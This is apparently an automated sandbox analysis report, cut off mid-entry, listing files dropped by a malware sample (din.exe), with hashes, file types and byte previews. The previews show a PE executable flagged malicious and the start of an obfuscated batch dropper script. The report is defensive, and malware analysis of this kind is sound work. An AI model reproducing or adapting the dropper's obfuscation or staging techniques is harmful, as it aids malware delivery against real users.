                                                                                                                                                                                                                                                                                      Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/30505A642E21A28EB89AC35979B77123",.. "id": "30505A642E21A28EB89AC35979B77123",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/30505A642E21A28EB89AC35979B77123"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/F0316F1EB9B0B4C700DF3DD41989CB02",.. "id": "F0316F1EB9B0B4C700DF3DD41989CB02",.. "title": "WebRTC Internals Extension",.. "type": "background_page",.. "url": "chrome-extension://ncbjelpjchkpbikbpkcchkhkblodoama/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/F0316F1EB9B0B4C700DF3DD41989CB02"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\json[1].json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1787
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.360885277951859
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:SfNaoC5TECmfNaoCulCCCul1fNaoCxCMfNaoCfFg0UrU0U8Cfl:6NnC5TECONnCkCwNnCxC4NnCG0UrU0UT
                                                                                                                                                                                                                                                                                      MD5:EBFFFCD97E11CF9A6F99AC501C097C6D
                                                                                                                                                                                                                                                                                      SHA1:A146A8C47CFDDEEA8AF24B173E383AEA80F02E09
                                                                                                                                                                                                                                                                                      SHA-256:C548C806FB6B4DE11B717ACD5EC54D105A2E779596CAAD1F8C380118A87D7A7C
                                                                                                                                                                                                                                                                                      SHA-512:1824713A41E35B0D8924753153AAC1C8080375F56CB0329164978996B00C03627B66FD4952D2A02DF2BE6ED16DE1C5B3F6072B665A9E35204E93006E3E9EA41C
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/EBFA2E5C191DB22C2ED3BB66BBDD9CB2",.. "id": "EBFA2E5C191DB22C2ED3BB66BBDD9CB2",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/EBFA2E5C191DB22C2ED3BB66BBDD9CB2"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/FEB65A3F9AF1051FF8249C9ABFFAF021",.. "id": "FEB65A3F9AF1051FF8249C9ABFFAF021",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/FEB65A3F9AF1051FF8249C9ABFFAF021"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\1f2618a4-cae6-4b1a-aca9-26175bf9c069.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):154477
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                      MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                      SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                      SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                      SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\251a38ac-fff5-4024-9305-dff9b6f82838.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                      MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                      SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                      SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                      SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\322891\Centered.com

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                                                      Size (bytes):947288
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.630612696399572
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                                                                                                                                                                                                      MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                                                      SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                                                                                                                                                                                                      SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                                                                                                                                                                                                      SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\322891\I

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):279948
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.999452908363733
                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                      SSDEEP:6144:9I6GDSktA64fYoI9b2JcEXRnH2CrbDFblEw6jcduSayn4YVyWnG:SGeoTaq1BWCrfFblEw7/G
                                                                                                                                                                                                                                                                                      MD5:964C7B84B1CC40E6989696C505EDF218
                                                                                                                                                                                                                                                                                      SHA1:49F295A8053FDCA1ADDF009E1BDC8C59EF809E98
                                                                                                                                                                                                                                                                                      SHA-256:A29DD71C7574F57B4FE5351625CEEBE6096D7B2F5D91CD98B85573D5215C7CF4
                                                                                                                                                                                                                                                                                      SHA-512:A183C02C2810D202D29C2119718CEE5EA7A5F6562433B1F7D3F206879F35940DDD595EA4B6AC48796B603FDD060B49318F2B6464482ED23900404A19E608F514
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:..b0O./....)..?......fU6G.~W..H#d[:F..$.3B.$.6.gm...y.6|..........Q.S..+.K|0.....EK..$.9..'..'.....b..0#M!...[......G[.,E....*.$....L..d.(].9.\}./h.SJ6j.....p#..~>Nh...#......g..2.-S.%...Hd.:lsA......z.+7..B.I.`.@P.xB.K...g.).D.g..><.l'.P&......3.1.m.8...s..Q....".5.....I.....LSn.Ie.^k.b*........n.{..S.~'....2nI..E..`.K...x..3.OE......[;..@..4>Q..3...0.V...eUX}.2.{..:.%..w..DMp...A.t.V.i.LA.....X.hPW."~.o....Faw>..D..CO.p..^...........Q.....a.H...Q.H..a..p......2p...[..m0uRi...D.#..s!........]...4(.^)S.+0...Z.t..y...O..$D..gZ..s..|'S./AG.{=...5n..>U.}D9.S...~..ZJ.p...ux^/.p.%...5.5..........#.c.=..c...N..^. .JILp.a...j...C2wb$.b.o..l.a.:P..a..../Cp.....D.0f9....wU...ISH.Y.;r...pe....)......}....;...0..9EuC.....4.D.,k..J^6D.R|C.*.4#n...T6K.xG......U..ND...0UZTYqx(.{.9.x......c.t..........................k..|Y..:`....!.G..a......Y.....0.._R1..m.....d6|.J..9.....C.L.?...7j..vJ8.....d.ek.b.M.....!}.yb.,..........N:.'..Y...;(..T..ZkE........

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\47106046-6560-4766-9ef3-ce200edfce8b.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):11185
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                      MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                      SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                      SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                      SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\704ba1d4-0f74-4363-9dc8-decedf68fd19.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:PNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):103855
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.924096864897051
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3072:RMz/M7tHsx/iGyQVUdJpABfSi77IbHZ0PmFKq:lds9iGyQVUd0Bf77cZPT
                                                                                                                                                                                                                                                                                      MD5:BF3BA995DA7EBD2C798D60CE43BE3281
                                                                                                                                                                                                                                                                                      SHA1:0C49C0363019C027303DA06A844E9AA5467B1958
                                                                                                                                                                                                                                                                                      SHA-256:03FD23C77660CDF0C2C24F904662B9EAB30CB5C6D630C91771C89DACAF2FFD4E
                                                                                                                                                                                                                                                                                      SHA-512:5C9A18050C6D67CB50E6D7F09ED15E73B2BC6D19B6EA51683C04D5444EEB22AB37944D8678EAF4C54DA03B22856870B2B785F48F8BC916F03419D30E951C25C8
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR...2...2......?......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....eXIfMM.*.............................J...........R.(...........i.........Z.......H.......H.............................2...........2...........pHYs................YiTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 6.0.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:tiff="http://ns.adobe.com/tiff/1.0/">. <tiff:Orientation>1</tiff:Orientation>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>..^......IDATh..Z.t\.y.f.fF.b$.....2.%.0`...qR..&.J..4...a+1.p....z ...J....p @h....W..E.b-3...w.<i$.b..........+.S.Ip*....\n...7..#........m.......s....3~..D.nn.,.y.Q..@eA5f.7`F.L.e.#3#.nX.*.D.n...n.U.e.g.\H...>IW.s.s..!.D.r[.K.....-k.r..x...@.(..<O6<n.D..r.TmD.$c.'z..A....../..?@]Y.....2...d....J...+.t=.l.}.!.RH.I..H`..xo..X..)...e.. c..n#..d...p..Bz.*....(.$....4E:.L.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Activated

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\din.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):110592
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.280376662201836
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3072:VZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laWS:VK5vPeDkjGgQaE/l8
                                                                                                                                                                                                                                                                                      MD5:87BB88EBBC24DD6F13DE197D0F6A7862
                                                                                                                                                                                                                                                                                      SHA1:07CA6F0247975D6B7BE7371E460272562A28C183
                                                                                                                                                                                                                                                                                      SHA-256:06A470E2DAD7EADF779865990F9AC593D396CED7103FBB8BF81EB52FAC2A94EB
                                                                                                                                                                                                                                                                                      SHA-512:06F1A3E5A2311F360E0414D5EA5253E092D04A681A47EB6D12159AE4DB196FDDAC3052190537DE8F90D6268D56917F93BA7D78E45C5E50767F91C0BA2FFD95F8
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:....V..N.....F.^[]......U..QQ.}..........L)M....tv.}.........@)M.3.VW.}.B....U..0...E............}..t .M.......~L........E.j.P.FL......E....u..E ...u..~8...q....._^....3....FP..FT..U...u...(M..K...P.....j.j.j..u...x.I.]...U..Q.@)M.V.u.Wj.....8W.z...............d)M.j.Z.U.;........T)M.....0.........F.;G.u{............8......../.....................VW......~d...(....~h...0....~D...8....~P...@....>.t..6..<.I..&..u........d)M..U.B.U.;..._....u... .........$.........@)M........t.Q.=.....@)M..... ..5.)M..E.N.5.)M.;.L)M.u...L)M....D)M.........._..^u..5.)M.j.....I..%.)M....D)M...t..@)M..D...8.u..<)M...........U..E.VW.@......P......u..........>3._.F.....^]...U......`.D$.V.u.WP.D$.PV..............L$..@)M..T$..L$........T)M..L$.....8.|$..............'........P............H..............a...WQ.P....7..<.I..t$...D.........d.........h.........P........D$.;F.t.P.....3.@_^..]....L$..N...3...U..V.u.;5t)M.........T)M........t.Q......T)M..... ...`)M...T)M.;5d)M.u....|.....8.u.N...5d)M...X)M.^...

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Appreciated

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\din.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (318), with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):10821
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.174883446196345
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:x788DwR7CRUOTQFvnjMYGi8hD8liZZjvMq5ZFKRnz/Vbaa1zOJAV6BgFmWCH3h:xoAwR7CRUOMBno1hdZFz5SRnTQa1qJWS
                                                                                                                                                                                                                                                                                      MD5:9B1C1B91D5DD7CD249DFC18C83265CAD
                                                                                                                                                                                                                                                                                      SHA1:A7BE36A126B1650E3B1AA5150DCE01877972AD2B
                                                                                                                                                                                                                                                                                      SHA-256:256DAB2DE8F31FD3B6DDEC1D1CA49A79BBD8DE0EC9997256169E35C22BFCB477
                                                                                                                                                                                                                                                                                      SHA-512:CB71A372EEFBB519C5CBBAC618C031AB6BC6E7B1FB19C7D250B16D51B1EDC9349E72E1D263006ADD5253C268B23CD5887F1171B65A3FA708864D58BC90762B69
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:Set Una=q..aChRModerate-Slave-Promotions-Respective-Edges-Regarding-Coupon-Neither-..rwwIcon-Channel-Garbage-Winners-Trademarks-..dOcxPf-Identity-Are-..GbYFont-Newest-Retreat-Quote-Forms-Chuck-Performer-Electric-Sunrise-..TtgEpa-Garage-Bottle-Made-Friends-Owners-..BrHostel-Individually-..Set Camel=y..wQAReconstruction-Activists-Yeah-Phil-Distribute-Cartoons-Minds-Gym-..sYKTue-Snake-Catering-Nl-Newsletters-Floyd-Virgin-..GeEDUr-..xpvMEnzyme-Gibson-..PuVmAdvise-Recommendation-Tp-Riverside-..THLJHundreds-..CoyHansen-Bedroom-Conferences-Conspiracy-Proceeding-Acknowledge-Gender-Tomorrow-Danish-..zCeIssue-Privacy-Sustainability-Longitude-..UuQContrast-Edited-Chapter-Protocols-Cats-Write-Douglas-..Set Appendix=6..wHAmazing-Kinda-Rca-Compression-Perception-Browser-Stockholm-Experiment-..FmOLaunched-..mfAutomatic-App-Jury-Puzzles-Respect-Sku-..TbUri-Fever-Morning-Determine-Peterson-Consent-..MaAdventure-Desktops-Cocks-Unique-Paxil-..CSKQGot-Fight-Mobiles-Viewed-Newscom-Globe-Exchange-..VVOJGian

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Appreciated.cmd

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (318), with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):10821
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.174883446196345
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:x788DwR7CRUOTQFvnjMYGi8hD8liZZjvMq5ZFKRnz/Vbaa1zOJAV6BgFmWCH3h:xoAwR7CRUOMBno1hdZFz5SRnTQa1qJWS
                                                                                                                                                                                                                                                                                      MD5:9B1C1B91D5DD7CD249DFC18C83265CAD
                                                                                                                                                                                                                                                                                      SHA1:A7BE36A126B1650E3B1AA5150DCE01877972AD2B
                                                                                                                                                                                                                                                                                      SHA-256:256DAB2DE8F31FD3B6DDEC1D1CA49A79BBD8DE0EC9997256169E35C22BFCB477
                                                                                                                                                                                                                                                                                      SHA-512:CB71A372EEFBB519C5CBBAC618C031AB6BC6E7B1FB19C7D250B16D51B1EDC9349E72E1D263006ADD5253C268B23CD5887F1171B65A3FA708864D58BC90762B69
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:Set Una=q..aChRModerate-Slave-Promotions-Respective-Edges-Regarding-Coupon-Neither-..rwwIcon-Channel-Garbage-Winners-Trademarks-..dOcxPf-Identity-Are-..GbYFont-Newest-Retreat-Quote-Forms-Chuck-Performer-Electric-Sunrise-..TtgEpa-Garage-Bottle-Made-Friends-Owners-..BrHostel-Individually-..Set Camel=y..wQAReconstruction-Activists-Yeah-Phil-Distribute-Cartoons-Minds-Gym-..sYKTue-Snake-Catering-Nl-Newsletters-Floyd-Virgin-..GeEDUr-..xpvMEnzyme-Gibson-..PuVmAdvise-Recommendation-Tp-Riverside-..THLJHundreds-..CoyHansen-Bedroom-Conferences-Conspiracy-Proceeding-Acknowledge-Gender-Tomorrow-Danish-..zCeIssue-Privacy-Sustainability-Longitude-..UuQContrast-Edited-Chapter-Protocols-Cats-Write-Douglas-..Set Appendix=6..wHAmazing-Kinda-Rca-Compression-Perception-Browser-Stockholm-Experiment-..FmOLaunched-..mfAutomatic-App-Jury-Puzzles-Respect-Sku-..TbUri-Fever-Morning-Determine-Peterson-Consent-..MaAdventure-Desktops-Cocks-Unique-Paxil-..CSKQGot-Fight-Mobiles-Viewed-Newscom-Globe-Exchange-..VVOJGian

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Becomes

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\din.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):61836
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.997252530589562
                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                      SSDEEP:1536:N0nErpywxLH42VwRdQegiDayorDRk4XcxP9YnWnG:NIENy6jVwRd1gSayorDa4YP9yWnG
                                                                                                                                                                                                                                                                                      MD5:6D7407741F7BC4D14B1A165CAE065EAE
                                                                                                                                                                                                                                                                                      SHA1:D3FF6FAFDBEC63432748F2911584F9F0EDD35E80
                                                                                                                                                                                                                                                                                      SHA-256:5AF440AFD27D24086571B7F38985B3F3B53B1EBF9C726F247A498AB59AC0EB52
                                                                                                                                                                                                                                                                                      SHA-512:6CBD54C3E909C279A35EE0FE3546DF8B2BD4F003BC9F86479406C69D4F5C008318018FC81BC1800544DBBD2DB8917C27055736AC3F335D490540EA6A0960BE1B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:\\ [..#:M..-@..}_:..|xU.Aj4.H.D._.ow._z0K.....F.y...U@..../....f.'..{...[l(..\.......L..k .....|...K.D..@Z..P.1xn......E..b...gF..|{...i..h...:q.7Q..H`M...doM_.f.n...........y.}..`.H......%.z..9........{..]...v...x.....x...M......e....h.. .E......[...o*Vx\...{/:.J.V..|.....~............u...%....w..kZt..5/TK..i\....`.Q.SR.....QV..V.b#.}.W...:.9.[C.EH+.P.B.....N...7{N.;GD...r.d...yf..vy.W....n.....8.AkvVqm....t.bg]..i.w........Qy..}Vn-p..{^.P..{.58yyJ05EF.-...b$....-.G.yi.9.........Sh.7....0.W...7fXn.f...7..&.jm$.....6.`g.A."_.X....R/!7...W7o[S...g.[9M.<}3.2..e.Fx.....-b.h..Lf.@.#RR#...'..O........83....A;?...._2C{.x.yx-.k.......<."[F...$8.".(.Q..6...D...5.t.@...b.&..3........c]q..sw.Q&b...%g..$.W...|.7...V...4...........5.Z.b.P.`.*7...A...J.J.......}L<.B.8.....$....Y.0v...3Eg....#...+.2.p...{z.W.....Qq........{K..2f.....J..B.R....?......Fd.`n..%..}1..G.n.{(=.b.d;|.....mY._...w.......".."&......5_@.m.W...........~]..9+...1V.+.`.U....

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Bulgaria

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\din.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1938
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.913291123011718
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:D9n9mTsCNvEQH5O5U1nPKrhBzM1FoMPhu:hSEA5O5W+MfH5u
                                                                                                                                                                                                                                                                                      MD5:1D5C9309802807FDA7F567C0EB99C511
                                                                                                                                                                                                                                                                                      SHA1:9F1F7BFD13AC93A8748C8C7D6716790CE0EF8ADE
                                                                                                                                                                                                                                                                                      SHA-256:B3D39CC1EBF070F3EAC4C6922A64E4B689D527FDC98D4D8B005BB1E54636ACD0
                                                                                                                                                                                                                                                                                      SHA-512:D2E84ED1F3562B6C417685CA4E894B18002E6C4A0169C5276FEAD7C3C2D53E52D505F578F3FE93E020D78D80E25A94D315B202816F6793F2D30141E72E8AB95B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:cache........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B...........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Changing

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\din.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):57344
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.582971432205184
                                                                                                                                                                                                                                                                                      Encrypted:false
